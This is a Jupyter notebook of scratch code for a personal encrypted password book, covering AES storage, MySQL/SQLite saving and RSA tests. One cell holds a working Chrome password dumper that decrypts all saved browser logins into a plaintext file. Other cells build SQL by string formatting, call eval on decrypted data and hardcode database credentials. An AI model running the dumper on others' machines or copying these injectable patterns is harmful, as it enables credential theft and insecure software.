In [1]:
import Menus
from hashlib import sha512, sha256, md5
from base64 import b64encode, b64decode
from time import sleep
from os import system
from Crypto.Cipher import AES

In [2]:
def pkcs7_pad(content, block_size=32):                              # fill up by PKCS7
    padding = block_size - len(content) % block_size       # 
    # return: bytes
    return content + bytes([padding] * padding)

def pkcs7_unpad(content):
    return content[:-ord(content[-1:])]

In [3]:
def encrypt_AES(key, iv, content):                                      # Encrypt and Decrypt by AES (CBC)
    try:
        encrypt = AES.new(key, AES.MODE_CBC, iv)        # use CBC
    except Exception as e:
        print(e)
        return('Error: init failed!')

    # content_pad = pkcs7_pad(content).encode()
    AES_encrypt = b64encode(encrypt.encrypt(pkcs7_pad(content)))
    return AES_encrypt

def decrypt_AES(key, iv, content):
    try:
        decrypt = AES.new(key, AES.MODE_CBC, iv)
    except Exception as e:
        print(e)
        return('Error: init failed!')

    # content = content.encode('utf-8')
    AES_decrypt = decrypt.decrypt(b64decode(content))
    return pkcs7_unpad(AES_decrypt)

In [4]:
def hash_verify(key):
    key_l = list(key)
    for member in range(len(key_l)):
        key_l[member] = sha512(key_l[member].encode()).hexdigest()
    key_hash = sha256(''.join(key_l).encode()).digest()
    return b64encode(key_hash)


def hash_crypt(key):            # utf-8
    key_l = list(key)
    iv_l = list(key[: len(key) // 2])
    for member in range(len(key_l)):
        key_l[member] = sha512(key_l[member].encode()).hexdigest()
    for mem in range(len(iv_l)):
        iv_l[mem] = sha512(iv_l[mem].encode()).hexdigest()
    # key = hashlib.sha256(''.join(key_l).encode()).digest()
    # iv = hashlib.md5(''.join(iv_l).encode()).digest()
    return sha256(''.join(key_l).encode()).digest(), md5(''.join(iv_l).encode()).digest()

In [ ]:
def wrongInput():
    print('Wrong input!!!!')
    sleep(1)

def quitProgram():
    os.system('pause')
    exit()

In [ ]:
def readCipher(fileName):                               # Read and write
    if os.path.exists(fileName):
        with open(fileName, 'r') as f:
            cipherBook = f.readlines()
        return cipherBook
    else:
        print('File does not exist!')
        quitProgram()

def writeCipher(fileName, cipherBook, way):
    with open(fileName, way) as f:
        f.write(cipherBook)

In [ ]:
def deleteDic(content):
    name = input('Please enter the name of the account you want to delete: ')
    if name in content.keys():
        content.pop(name)
        print('Account deleted!')
    else:
        print('Sorry, you have no such item!')
    return content

def findDic(content):
    print(content.keys())
    name = input('Please enter the name of the account you want to find: ')
    if name in content.keys():
        print(name, ':', content[name])
    else:
        print('Sorry, you have no such account!')

In [ ]:
def optionsFuction(content, key_input_byte, iv_input, path, question, answer_input_SHA):
    key_input, answer_input = '', ''
    while True:
        choice = Menus.BookMenu()
        if choice == '1':
            updateDic(content)
        elif choice == '2':
            deleteDic(content)
        elif choice == '3':
            findDic(content)
        elif choice == '4':
            choices = Menus.SecurityMenu()
            if choices == 'a':
                key_input = input('Please input your new key: ')
                key_input_byte = hashlib.sha256(
                    key_input.encode('utf-8')).digest()
                print('Key changed!')
                sleep(1.5)
            elif choices == 'b':
                question = input('Please input your new question: ')
                print('Question changed!')
                sleep(1.5)
            elif choices == 'c':
                answer_input = input('Please input your new answer: ')
                answer_input_SHA = hashlib.sha256(
                    answer_input.encode('utf-8')).hexdigest()
                print('Answer changed!')
                sleep(1.5)
        elif choice == '5':           # choose save or not save
            if content == '' or key_input_byte == '' or answer_input_SHA == '':
                print('Something Empty!')
                print('Changes not saved!')
                sleep(1.5)
                break
            else:
                saveBool = input('Do you want to save your changes? (y/n) ')
                if saveBool == 'y':
                    iv_input = hashlib.md5(
                        (key_input + answer_input).encode('utf-8')).digest()
                    content = encrypt_AES(key_input_byte, iv_input, str(content))
                    # break
                    writeCipher(path, question + '\n', 'w')
                    writeCipher(path, answer_input_SHA + '\n', 'a')
                    writeCipher(path, content, 'a')
                    print('Changes saved!')
                    sleep(1)
                    # return content, answer_input_SHA, path, question
                    break
                elif saveBool == 'n':
                    print('Changes not saved!')
                    sleep(1)
                    break

        else:
            wrongInput()

In [ ]:
def firstTime():
    key_dict = {}
    key_input_byte, iv_input, question, answer_input_SHA = b'', '', '', ''
    path = input('Please input the path of your KEY file where you want to save: \n')
    print('Warning: You must do(1),(4: a,b,c)')
    sleep(3)
    return optionsFuction(key_dict, key_input_byte, iv_input, path, question, answer_input_SHA)

In [ ]:
def hadBook():
    content, key_input_byte, answer_input_SHA, iv_input, path, question = verify()
    content = eval(content)
    print(content)
    return optionsFuction(content, key_input_byte, iv_input, path, question, answer_input_SHA)

In [ ]:
def verify(fileread):
    # path = input('Please input the path of your KEY file: \n')
    # fileread = File.readCipher(path)
    if fileread:
        while True:
            question = fileread[0].strip('\n')
            print(question)
            key_input = input('Please input your Key: \n')
            key_SHA = fileread[1].strip('\n')
            if key_SHA == hash_verify(key_input):
                print('Key correct!')
                break
            else:
                print('Key wrong!', '\n')
        return fileread[2], key_input, question
    else:
        return None, None, None

In [ ]:
def main():
    while True:
        choice = Menus.MainMenu()
        if choice == '1':
            firstTime()
        elif choice == '2':
            hadBook()
        elif choice == '3':
            decide = input('Are you sure to exit? (y/n)')
            if decide == 'y':
                print('Goodbye!')
                quitProgram()
            elif decide == 'n':
                continue
            else:
                wrongInput()
                continue
        else:
            wrongInput()

if __name__ == '__main__':
    main()            

In [ ]:
def updateDic(content):
    name = input('Please enter the name of the item you want to update: ')
    if name in content.keys():
        print('Updating.....')
    else:
        print('Adding.....')
    item = input('Please enter the new item: ')
    value = input('Please enter the new value: ')
    if item and value:
        content.update({name: {item: value}})
        print('Account updated!')
        sleep(1)
    else:
        print('Error: One of variables empty!')
    return content


In [ ]:
# import json
test_d = {'twitter': {'account_name': 'gandaove', 'password': {'No.1': '流行', 'No.2': '654321'}}}
# print(test_d)
append = {'mention': "Don't lose it!"}
tt = {'qq': {'account_name': '1404724243', 'password': 'fuck'}}
test_d['twitter'].update(append)
test_d.update(tt)
# each_print(test_d, 0)
# print(json.dumps(test_d, indent=3, ensure_ascii=False))

In [ ]:
# write a print (like json.dumps) function that can print nested dicts
def print_json(dic, t):
    if isinstance(dic, dict):
        for key, value in dic.items():
            print('\n' + '\t' * t + key + ':', end='')
            if isinstance(value, dict):
                print_json(value, t + 1)
            else:
                print(' ' + value, end='')
    else:
        print(dic)
# print_json(test_d, 0)


In [ ]:
def finding(content, name):
    if name:
        if isinstance(content, dict):
            for key, value in content.items():
                if name == key or name == value:
                    print(key + ': ' + value)
                else:
                    finding(value, name)
    else:
        print_json(content, 0)
name = ''
finding(test_d, name)

In [ ]:
# Chrome pwd load
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import datetime, timedelta


def get_chrome_datetime(chromedate):
    """从chrome格式的datetime返回一个`datetime.datetime`对象
因为'chromedate'的格式是1601年1月以来的微秒数"""
    return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)


def get_encryption_key():
    local_state_path = os.path.join(os.environ["USERPROFILE"],
                                    "AppData", "Local", "Google", "Chrome",
                                    "User Data", "Local State")
    with open(local_state_path, "r", encoding="utf-8") as f:
        local_state = f.read()
        local_state = json.loads(local_state)

    key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    key = key[5:]
    return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]


def decrypt_password(password, key):
    try:
        iv = password[3:15]
        password = password[15:]
        cipher = AES.new(key, AES.MODE_GCM, iv)
        return cipher.decrypt(password)[:-16].decode()
    except:
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except:
            # not supported
            return ""


def main():
    key = get_encryption_key()
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                           "Google", "Chrome", "User Data", "default", "Login Data")
    filename = "ChromeData.db"
    shutil.copyfile(db_path, filename)
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    cursor.execute(
        "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
    # iterate over all rows
    with open('ChromePwd.txt', 'w') as f:
        for row in cursor.fetchall():
            origin_url = row[0]
            action_url = row[1]
            username = row[2]
            password = decrypt_password(row[3], key)
            date_created = row[4]
            date_last_used = row[5]
            if username or password:
                f.write(f"Origin URL: {origin_url}"+'\n')
                f.write(f"Action URL: {action_url}"+'\n')
                f.write(f"Username: {username}"+'\n')
                f.write(f"Password: {password}"+'\n')
            else:
                continue
            if date_created != 86400000000 and date_created:
                f.write(
                    f"Creation date: {str(get_chrome_datetime(date_created))}"+'\n')
            if date_last_used != 86400000000 and date_last_used:
                f.write(
                    f"Last Used: {str(get_chrome_datetime(date_last_used))}"+'\n')
            f.write("="*50+'\n')

    cursor.close()
    db.close()
    try:
        # try to remove the copied db file
        os.remove(filename)
    except:
        pass


main()


In [ ]:
# test pwd
import base64
import win32crypt
chrome_pwd = "RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABnKTxHmxUlQb9y9Wu8/A/+AAAAAAIAAAAAABBmAAAAAQAAIAAAAIo5s5Zb/jI6vMQfacTD/naTv+FyCBqPy2m08cyyrNmoAAAAAA6AAAAAAgAAIAAAALaMCFYTX7zuBNDP9LaiSMNGRFize3k5G1quWhudOMuWMAAAADiV57oNP0yXNiAGkfWZv6udt6Jka5YQ6GIDU1TN3GFw1mmKcjRQdP0dNZeUN+tqNkAAAAD+r4nGzhysIVE5yOaZz86NAUqcLilYF8pkDse34P2LER8Jt02ng3hZNscViEfA7yHMQdmS0c2CYOh2ZYcl5OwE"
chrome_pwd_de = base64.b64decode(chrome_pwd)[5:]
chrome_pwd_de = win32crypt.CryptUnprotectData(chrome_pwd_de, None, None, None, 0)[1]
# ...

In [ ]:
import os
def printDic(dic, t):
    if isinstance(dic, dict):
        for key, value in dic.items():
            print('\n' + '\t' * t + key + ':', end='')
            if isinstance(value, dict):
                printDic(value, t + 1)
            else:
                print(' ' + value, end='')
    else:
        print(dic)
    print()


def findDic(content):
    name = '222'
    if name == '':
        printDic(content, 0)
        # os.system('pause')
        return

    def find(content, name, road):
        if isinstance(content, dict):
            for key, value in content.items():
                state = 0
                if name == value:
                    print(road)
                    print(key, ':', value)
                elif name == key:
                    if isinstance(value, dict):
                        print(road + key)
                        printDic(content[name], 0)
                    else:
                        print(road)
                        print(key, ':', value)
                else:
                    road += key + ' --> '
                    if not isinstance(value, dict):
                        road = road.replace(key + ' --> ', '')
                    find(value, name, road)
                if not state:
                    road = road.replace(key + ' --> ', '')
    find(content, name, '')

In [ ]:
content = {'chat': {'pwd1': '111', 'possible': '222'}, 'chat2': {
    'no': {'pwd1': '3345', 'pwd2': {'poss1': 'damn', 'poss2': '222'}}, 'no2': {'ttt': '111', '32': '222'}}, 'wee': {'templer': 'p[]q'}}

findDic(content)

In [ ]:
# save to mysql
import MySQLdb
import os

content = {'chat': {'noob': 'lkin'}, 'chat2': {'no': {'pwd1':'111', 'pwd2':'222'}}}
question = '123456789'
key = '123456789'
key_byte, iv = hash_crypt(key)
key_hash = hash_verify(key)
content_cipher = encrypt_AES(key_byte, iv, str(content))

In [ ]:
# connect to db
# create a database name 'cipherBook'
def handle_exception(func):
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except MySQLdb.OperationalError as O:
            print(O)

    return wrapper

@handle_exception
def con():
    conn = MySQLdb.connect(host='localhost', user='bookuser', password='cipherbook', port=3306, charset='utf8')
    cursor = conn.cursor()
    # cursor.execute('create database if not exists cipherBook')
    conn.select_db('cipherBook')
    return conn, cursor


conn, cursor = con()

In [ ]:
select_key = "select key_hash from BookList where bookname = '{}'".format('tttt')
cursor.execute(select_key)
print(cursor.fetchone()[0])

In [ ]:
select = "select bookname from BookList where bookname = '{}'".format('te')
cursor.execute(select)
data = cursor.fetchone()


In [ ]:
# check if bookname exists
name = 'test'
check = "select bookname from booklist"
result = cursor.execute(check)
data = cursor.fetchall()
for i in data:
    if i[0] == name:
        print('bookname exists')
        break

In [ ]:
if not result:
    print('bookname not exists')

In [ ]:
# create table 'BookList'
# id: auto increment, primary key; name: varchar(255); question: text; key_hash: char(64); content_cipher: mediumtext
create_table = 'create table if not exists BookList(id int auto_increment primary key, bookname varchar(255) not null, question text, key_hash char(64) not null, content mediumtext not null) ENGINE=InnoDB DEFAULT CHARSET=utf8'
cursor.execute(create_table)

# insert data
# cursor.execute('insert into BookList(bookname, question, key_hash, content) values(%s, %s, %s, %s)', ('temp', question, key_hash, content_cipher))
insert = "insert into BookList(bookname, question, key_hash, content) values('{}', '{}', '{}', '{}')".format('temp', question, key_hash, content_cipher)
cursor.execute(insert)

# commit
conn.commit()

# close db
cursor.close()
conn.close()

In [ ]:
# delete from db (select by name)

import MySQLdb
conn = MySQLdb.connect(host='localhost', user='root', passwd='123456', port=3306, db='cipherBook')
cursor = conn.cursor()
# cursor.execute('delete from BookList where bookname = %s', ('test',))
use_db = 'use {}'.format('cipherBook')
cursor.execute(use_db)
delete = "delete from BookList where bookname = '{}'".format('test')
cursor.execute(delete)

In [ ]:
# test read .ini
import configparser
import os

# write .ini
config = configparser.ConfigParser()
config['DEFAULT'] = {'name': 'test', 'age': '18', 
    'fun': 'test'}

with open('test.ini', 'w') as f:
    config.write(f)

In [ ]:
import configparser
conf = configparser.ConfigParser()
with open('test.ini', 'r') as f:
    conf.read_file(f)
print(conf.items('DEFAULT'))

In [ ]:
# test md5 with salt (loop: 1000)
# achieve shiro's md5
import hashlib


def shiro_md5(source, salt='', iter=1):      # iter must >= 1
    if iter < 1:
        raise ValueError('iter must >= 1')
    md5_result = hashlib.md5((salt + source).encode('utf-8')).digest()
    if iter != 1:
        for i in range(iter - 1):
            # input bytes(no hex)
            md5_result = hashlib.md5(md5_result).digest()
    return md5_result.hex()


print(shiro_md5('000000', iter=2))


In [ ]:
# generate private key, and save to file
import os
import base64
from Crypto.PublicKey import RSA

key = RSA.generate(2048)
private_key = key.export_key()
public_key = key.publickey().export_key()
print(private_key)
print(public_key)
print(key)

from Crypto.Cipher import PKCS1_v1_5
data = 'str  --hashed data'
publicKey = RSA.import_key(public_key)
cipher = PKCS1_v1_5.new(publicKey)
cipher_text = base64.b64encode(cipher.encrypt(data.encode('utf-8')))
print(cipher_text)

In [ ]:
# write to file
with open('private.pem', 'wb') as f:
    f.write(private_key)
with open('public.pem', 'wb') as f:
    f.write(public_key)
# write cipher text to file
with open('cipher.txt', 'wb') as f:
    f.write(cipher_text)

In [ ]:
# read from file
with open('private.pem', 'rb') as f:
    private_key = f.read().decode()
with open('public.pem', 'rb') as f:
    publicKey = f.read().decode()
with open('cipher.txt', 'rb') as f:
    cipher_text = f.read().decode()


In [ ]:
# decrypt rsa
import base64
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5
privateKey = RSA.import_key(private_key)
cipher = PKCS1_v1_5.new(privateKey)
plain_text = cipher.decrypt(base64.b64decode(cipher_text), None).decode()
print(plain_text)

In [ ]:
# test File.Value
import File

obj = File.Value()
obj.create('e:/code/anki-main.z')
comb = {'Value.path': '', 'Value.name': '2', 'Value.thing': '3', 'Value.valuetype': 'str'}
if comb.keys() == obj.__dict__.keys():
    print('YES')
else:
    print(comb.keys())
    print(File.Value.__dict__)
bigger = {'pic': ''}
obj.__dict__ = comb

In [ ]:
with open('arrow.png', 'rb') as f:
    obj.thing = f.read()
# print(type(obj.__dict__))
bigger['pic'] = obj
print(bigger)

In [ ]:
import sqlite3      # use sqlite3 to save
import File

key, iv = hash_crypt('111')
key_hash = hash_verify('111')
question = '111'
content_cipher = {'string': 'temp', 'pic': 'arrow.png'}

strobj = File.Value()
strobj.create('temp')
content_cipher['string'] = strobj.__dict__

picobj = File.Value()
picobj.create('arrow.png')
# picobj.thing = str(picobj.thing)

content_cipher['pic'] = picobj.__dict__
cipher = encrypt_AES(key, iv, str(content_cipher))
cipher_decrypt = eval(decrypt_AES(key, iv, cipher))
# connect = sqlite3.connect('test.db')
# cursor = connect.cursor()

# create_table = "create table if not exists BookList(bookname varchar(255) not null primary key unique, question text, key_hash char(64) not null, content blob)"
# cursor.execute(create_table)
# insert = '''insert into BookList(bookname, question, key_hash, content) values("{}", "{}", "{}", "{}")'''.format('test', question, key_hash, cipher)
# cursor.execute(insert)

# # save db
# connect.commit()


In [ ]:
# test: if value too long, only encrypt part of it (abandoned)
import File
key1 = '333'
key_hash1, iv1 = hash_crypt(key1)
key2 = 'lsani3h73wi3h'
key_hash2, iv2 = hash_crypt(key2)
dict1 = {'string': 'temp', 'none_pic': {'Value.path': 'arrow.pg', 'Value.name': 'arrow.png', 'Value.thing': '3', 'Value.valuetype': 'str'}}

dict2 = {'string': 'lengr', 'real_pic': {'Value.path': 'arrow.png', 'Value.name': 'arrow.png', 'Value.thing': '3', 'Value.valuetype': 'bytes'}}

pic = File.Value()
pic.create('testmov.mp4')
dict2['real_pic'] = pic.__dict__

str_1024 = dict2['real_pic']['Value.thing'][:1024]
str_1024_cipher = encrypt_AES(key_hash2, iv2, str(str_1024)[2:-1])
dict2['real_pic']['Value.thing'] = dict2['real_pic']['Value.thing'].replace(str_1024, str_1024_cipher)

# with open('dict2.txt', 'wb') as f:
#     f.write(str(dict2).encode())

In [ ]:
import codecs       # use codecs to change to bytes without '\\'    (abandoned)
# test decrypt
str_1024_cipher_decrypt = decrypt_AES(key_hash2, iv2, str_1024_cipher)

str_1024_cipher_decrypt = codecs.escape_decode(str_1024_cipher_decrypt, 'hex-escape')[0]
print(str_1024_cipher_decrypt)
dict2['real_pic']['Value.thing'] = dict2['real_pic']['Value.thing'].replace(str_1024_cipher, str_1024_cipher_decrypt)

with open('arrow_verify.png', 'wb') as f:
    f.write(dict2['real_pic']['Value.thing'])

In [ ]:
import File
dict2 = {'string': {'str1': {'Value.path': '', 'Value.name': 'arrow.ggg', 'Value.thing': 'arrow.ggg', 'Value.valuetype': 'str'}}, 'real_pic': {'Value.path': 'arrow.png', 'Value.name': 'arrow.png', 'Value.thing': '3', 'Value.valuetype': 'bytes'}}
pic = File.Value()
pic.create('testmov.mp4')
dict2['real_pic'] = pic.__dict__
# print(dict2['real_pic']['Value.thing'][:102400])

key2 = 'lsani3h73wi3h'
key_hash2, iv2 = hash_crypt(key2)
for i in range(0, len(dict2['real_pic']['Value.thing']), 1024000 * 2):           # only crypt part...
    byte_1024 = dict2['real_pic']['Value.thing'][i:i+1024000]
    byte_1024_cipher = encrypt_AES(key_hash2, iv2, byte_1024)
    dict2['real_pic']['Value.thing'] = dict2['real_pic']['Value.thing'].replace(byte_1024, byte_1024_cipher, 1)
# cipher = encrypt_AES(key_hash2, iv2, dict2['real_pic']['Value.thing'])

In [11]:
with open('crypt.mp4', 'wb') as f:
    f.write(dict2['real_pic']['Value.thing'])
    # f.write(cipher)

In [ ]:
import _pickle as pickle            # use pickle to save(bin flow)
byte = pickle.dumps(dict2)
# with open('byte_dump.txt', 'wb') as f:
#     pickle.dump(dict2, f)

In [ ]:
key_hash, iv = hash_crypt('333')
cipher = encrypt_AES(key_hash, iv, byte)
with open('write_byte.txt', 'wb') as f:
    pickle.dump(cipher, f)
# decrypt
# cipher_decrypt = decrypt_AES(key_hash, iv, cipher)


In [ ]:
# test: use gzip
import gzip

with open('testPickle.key', 'rb') as f:
    file = f.read()
outputname = 'testPickle.key.gz'
with gzip.open(outputname, 'wb') as f:
    f.write(file)
